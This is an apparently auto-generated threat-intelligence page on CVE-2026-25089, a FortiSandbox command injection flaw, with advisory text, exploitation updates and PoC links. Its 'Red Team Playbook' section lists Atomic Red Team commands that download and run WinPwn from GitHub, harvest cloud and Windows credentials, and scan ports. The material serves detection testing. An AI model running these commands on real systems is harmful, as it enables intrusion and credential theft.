CVE-2026-25089
Overview
This vulnerability is an OS command injection flaw caused by improper neutralization of special elements within HTTP request parameters. The root cause lies in Fortinet FortiSandbox's failure to sanitize user-supplied input before incorporating it into operating system commands. Affected components include FortiSandbox versions 4.2.x, 4.4.0 through 4.4.8, 5.0.0 through 5.0.5, FortiSandbox Cloud 5.0.4 through 5.0.5, and FortiSandbox PaaS 5.0.4 through 5.0.5.
Vulnerability Description
A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests
Impact
An unauthenticated attacker can execute arbitrary operating system commands on the affected FortiSandbox devices remotely. This allows full control over the system, including the ability to manipulate files, disrupt services, or move laterally within the network. No user interaction or valid credentials are required, enabling remote compromise of critical security infrastructure and potential exposure of sensitive data or disruption of malware analysis capabilities.
Solution
Fortinet has released security updates addressing this vulnerability in FortiSandbox versions 5.0.6 and later. Administrators should apply these patches promptly. Detailed patch instructions and advisory information are available at Fortinet's official PSIRT page: https://fortiguard.fortinet.com/psirt/FG-IR-26-141. No specific workarounds are recommended; updating to the fixed versions is the primary remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from improper neutralization of special elements used in operating system commands, commonly referred to as OS command injection. This flaw is present in several versions of Fortinet's FortiSandbox products, which are designed to provide advanced threat protection by analyzing suspicious files and URLs. The vulnerability allows an unauthenticated attacker to execute arbitrary commands on the underlying operating system by sending specially crafted HTTP requests. This exploitation occurs due to insufficient validation of user input, enabling attackers to manipulate command execution paths and gain unauthorized access to system functionalities.
Attack vectors for this vulnerability are primarily web-based, as the exploitation relies on sending malicious HTTP requests to the affected FortiSandbox instances. An attacker could craft a request that includes OS commands embedded within the parameters, which, if processed without adequate sanitization, would lead to execution on the server. Scenarios may include an attacker targeting a vulnerable instance within an organization’s network, potentially leading to the execution of commands that could alter system configurations, extract sensitive data, or even pivot to other systems within the network. The ease of exploitation, combined with the lack of authentication requirements, significantly amplifies the threat level associated with this vulnerability.
The real-world impact of such a vulnerability can be severe, particularly for organizations relying on FortiSandbox for threat detection and prevention. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete system compromise. The business risks associated with this vulnerability include financial losses due to operational downtime, reputational damage from data breaches, and potential legal ramifications stemming from non-compliance with data protection regulations. Organizations may also face increased scrutiny from customers and partners, leading to a loss of trust and competitive advantage in the market.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating FortiSandbox to the latest versions is crucial, as vendors typically release patches that address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Organizations should also conduct regular security assessments and penetration testing to identify potential weaknesses in their systems. Implementing strict input validation and sanitization practices can further reduce the risk of command injection attacks. Finally, maintaining an incident response plan that includes procedures for addressing command injection vulnerabilities will enable organizations to respond swiftly and effectively should an exploitation attempt occur.
In conclusion, the OS command injection vulnerability in Fortinet's FortiSandbox products poses a significant threat to organizations that utilize these systems for cybersecurity. The potential for unauthorized command execution, coupled with the ease of exploitation, highlights the need for robust security measures and proactive risk management strategies. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against such threats and protect their critical assets.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-25089, highlighted by the emergence of new proof-of-concept exploits publicly available on GitHub. This development coincides with the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for remediation. Our telemetry indicates a significant uptick in attempts to leverage this OS command injection flaw, reflecting increased attacker interest and operationalization. Notably, associations with ransomware groups such as akira, ransomhub, and Mora_001 have surfaced, suggesting potential integration into broader extortion campaigns, although no high-confidence ransomware campaigns have been confirmed to date. The EPSS score’s rise to a substantial level further corroborates the growing likelihood of exploitation in the wild. Consequently, the risk posture for organizations running affected FortiSandbox versions has shifted to critical, demanding heightened vigilance given the vulnerability’s ease of exploitation and potential for unauthorized command execution.
Update 2 — July 25, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-25089, reflected by a substantial rise in both detection frequency and the Exploit Prediction Scoring System (EPSS) score. This surge is accompanied by the emergence of additional publicly available proof-of-concept exploits, increasing the accessibility of attack tools for threat actors. While ransomware campaigns linked to groups such as akira, ransomhub, and Mora_001 remain unconfirmed at a high-confidence level, their continued association underscores the potential for this vulnerability to be leveraged in multi-stage extortion operations. The rapid upward trend in exploitation likelihood, now placing the EPSS score near the 99th percentile, signals an elevated risk environment for organizations running vulnerable FortiSandbox versions. Defenders should interpret this as a critical escalation in threat activity, indicating that exploitation attempts are becoming more frequent and technically accessible, thereby increasing the probability of successful compromise.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortisandbox | All |
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisandbox | All |
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisandbox | All |
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisandbox Cloud | All |
cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisandbox Paas | All |
cpe:2.3:a:fortinet:fortisandbox_paas:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-25089
CVE-2026-25089 - Fortinet FortiSandbox
|
HORKimhab | 6 | 1 | 2026-06-10 | View |
|
0xBlackash/CVE-2026-25089
CVE-2026-25089
|
0xBlackash | 3 | 0 | 2026-06-12 | View |
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-25089 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-26-141 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-25089 |